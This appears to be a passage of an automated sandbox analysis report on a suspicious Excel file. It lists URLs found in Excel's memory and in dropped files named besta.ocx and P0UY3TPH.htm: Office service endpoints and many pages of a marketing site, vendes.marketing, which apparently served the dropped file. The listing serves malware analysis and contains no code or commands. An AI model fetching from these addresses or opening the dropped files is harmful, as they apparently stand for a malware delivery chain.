    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comP
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comS
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comw
    Source: EXCEL.EXE, 00000000.00000003.756417957.0000000013449000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301431299.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619881271.0000000013464000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639155238.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497053318.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637228311.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576149956.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579209762.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.580928076.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505119246.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301501898.000000001348B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766838985.000000001344A000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileBearer
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://tasks.office.com
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://tellmeservice.osi.office.netst
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/7/
    Source: EXCEL.EXE, 00000000.00000003.756417957.0000000013449000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301431299.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619881271.0000000013464000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639155238.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497053318.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637228311.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576149956.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579209762.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.580928076.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505119246.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301501898.000000001348B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766838985.000000001344A000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.htmlInsightsImmersivehttps
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: EXCEL.EXE, 00000000.00000003.756085438.000000000F935000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576719662.000000000F935000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.504427495.000000000F935000.00000004.00000001.sdmpString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html0
    Source: P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/
    Source: EXCEL.EXE, 00000000.00000003.504647326.0000000015CD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581482859.0000000015CD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579110952.0000000015CD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.577081581.0000000015CD6000.00000004.00000001.sdmpString found in binary or memory: https://vendes.marketing/RRC:
    Source: EXCEL.EXE, 00000000.00000003.496597476.0000000015D73000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496513135.0000000015D63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496650266.0000000015D98000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496638408.0000000015D97000.00000004.00000001.sdmp, besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital-en-cdmx/
    Source: EXCEL.EXE, 00000000.00000003.496597476.0000000015D73000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496513135.0000000015D63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496650266.0000000015D98000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496638408.0000000015D97000.00000004.00000001.sdmp, besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital-en-guadalajara/
    Source: EXCEL.EXE, 00000000.00000003.496597476.0000000015D73000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496513135.0000000015D63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496650266.0000000015D98000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496638408.0000000015D97000.00000004.00000001.sdmp, besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital-en-monterrey/
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/consultorias/
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/consultorias/auditorias-y-optimizacion-de-camp
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/consultorias/consultoria-en-marketing-basado-e
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/consultorias/consultoria-para-adsense/
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/consultorias/consultoria-para-youtube/
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/consultorias/digital-partner-incubadora-de-neg
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/consultorias/marketing-para-el-sector-salud/
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/consultorias/marketing-para-inmobiliarias-cons
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/consultorias/marketing-para-startups/
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/consultorias/transformacion-de-empresas/
    Source: EXCEL.EXE, 00000000.00000003.496597476.0000000015D73000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496513135.0000000015D63000.00000004.00000001.sdmp, besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/amazon-seo/
    Source: EXCEL.EXE, 00000000.00000003.496597476.0000000015D73000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496513135.0000000015D63000.00000004.00000001.sdmp, besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/conversion-rate-optimizati
    Source: EXCEL.EXE, 00000000.00000003.496597476.0000000015D73000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496513135.0000000015D63000.00000004.00000001.sdmp, besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/crm/
    Source: EXCEL.EXE, 00000000.00000003.496597476.0000000015D73000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496513135.0000000015D63000.00000004.00000001.sdmp, besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/emailing/
    Source: EXCEL.EXE, 00000000.00000003.496597476.0000000015D73000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496513135.0000000015D63000.00000004.00000001.sdmp, besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/google-merchant-center/
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/pagos-online/
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/tienda-online-con-magento/
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/tienda-online-con-shopify/
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/tienda-online-con-wordpres
    Source: EXCEL.EXE, 00000000.00000003.496597476.0000000015D73000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496513135.0000000015D63000.00000004.00000001.sdmp, besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/tiendas-en-facebook-e-inst
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/ecommerce/
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/ecommerce/amazon-seo/
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/ecommerce/conversion-rate-optimization/
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/ecommerce/crm/
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/ecommerce/emailing/
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/ecommerce/google-merchant-center/
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/ecommerce/pagos-online/
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/ecommerce/tienda-online-con-magento/
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/ecommerce/tienda-online-con-shopify/
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/ecommerce/tienda-online-con-wordpress-woocomme
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/ecommerce/tiendas-en-facebook-e-instagram/
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-creativos/
    Source: P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-creativos/branding/
    Source: P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-creativos/diseno-editorial/
    Source: P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-creativos/diseno-grafico/
    Source: P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-creativos/diseno-web-ux/
    Source: P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-creativos/fotografia-y-edicion/
    Source: P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-creativos/produccion-audiovisual/
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-de-desarrollo-web/
    Source: P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-de-desarrollo-web/automatizacion-de-
    Source: P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-de-desarrollo-web/desarrollo-de-apli
    Source: P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-de-desarrollo-web/desarrollo-de-mega
    Source: P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-de-desarrollo-web/desarrollo-de-pagi
    Source: P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-de-desarrollo-web/desarrollo-de-tien
    Source: P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-de-marketing-digital/
    Source: P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-de-marketing-digital/creacion-de-con
    Source: P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-de-marketing-digital/estrategias-en-
    Source: P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-de-marketing-digital/facebook-ads/
    Source: P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-de-marketing-digital/google-ads-adwo
    Source: P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-de-marketing-digital/inbound-marketi
    Source: P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-de-marketing-digital/inteligencia-de
    Source: P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-de-marketing-digital/publicidad-digi
    Source: P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-de-marketing-digital/seo-posicionami
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/blog/
    Source: EXCEL.EXE, 00000000.00000003.496136288.00000000135F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497239487.0000000013635000.00000004.00000001.sdmp, besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/comments/feed/
    Source: EXCEL.EXE, 00000000.00000003.496136288.00000000135F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497239487.0000000013635000.00000004.00000001.sdmp, besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/feed/
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor-pro/assets/css/frontend.min.css?ver=3.0.2
    Source: EXCEL.EXE, 00000000.00000003.496597476.0000000015D73000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496513135.0000000015D63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496650266.0000000015D98000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496638408.0000000015D97000.00000004.00000001.sdmp, besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor-pro/assets/js/frontend.min.js?ver=3.0.2
    Source: EXCEL.EXE, 00000000.00000003.496597476.0000000015D73000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496513135.0000000015D63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496650266.0000000015D98000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496638408.0000000015D97000.00000004.00000001.sdmp, besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor-pro/assets/lib/lottie/lottie.min.js?ver=5.6.6
    Source: EXCEL.EXE, 00000000.00000003.496597476.0000000015D73000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496513135.0000000015D63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496650266.0000000015D98000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496638408.0000000015D97000.00000004.00000001.sdmp, besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor-pro/assets/lib/smartmenus/jquery.smartmenus.mi
    Source: EXCEL.EXE, 00000000.00000003.496597476.0000000015D73000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496513135.0000000015D63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496650266.0000000015D98000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496638408.0000000015D97000.00000004.00000001.sdmp, besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor-pro/assets/lib/sticky/jquery.sticky.min.js?ver
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.4.8
    Source: EXCEL.EXE, 00000000.00000003.496597476.0000000015D73000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496513135.0000000015D63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496650266.0000000015D98000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496638408.0000000015D97000.00000004.00000001.sdmp, besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.4.8
    Source: EXCEL.EXE, 00000000.00000003.496597476.0000000015D73000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496513135.0000000015D63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496650266.0000000015D98000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496638408.0000000015D97000.00000004.00000001.sdmp, besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.4.8
    Source: EXCEL.EXE, 00000000.00000003.496597476.0000000015D73000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496513135.0000000015D63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496650266.0000000015D98000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496638408.0000000015D97000.00000004.00000001.sdmp, besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/js/preloaded-modules.min.js?ver=3.4.8
    Source: EXCEL.EXE, 00000000.00000003.496597476.0000000015D73000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496513135.0000000015D63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496650266.0000000015D98000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496638408.0000000015D97000.00000004.00000001.sdmp, besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.4.8
    Source: EXCEL.EXE, 00000000.00000003.496597476.0000000015D73000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496513135.0000000015D63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496650266.0000000015D98000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496638408.0000000015D97000.00000004.00000001.sdmp, besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=3
    Source: EXCEL.EXE, 00000000.00000003.496597476.0000000015D73000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496513135.0000000015D63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496650266.0000000015D98000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496638408.0000000015D97000.00000004.00000001.sdmp, besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js?ver=4.8.1
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.eot?5.10.0);src
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.svg?5.10.0#eico
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.ttf?5.10.0)
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff2?5.10.0)
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff?5.10.0)
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/font-awesome/css/all.min.css?ver=4.
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.min.css?ver
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/font-awesome/css/font-awesome.min.c
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.cs
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ver=
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/font-awesome/css/v4-shims.min.css?v
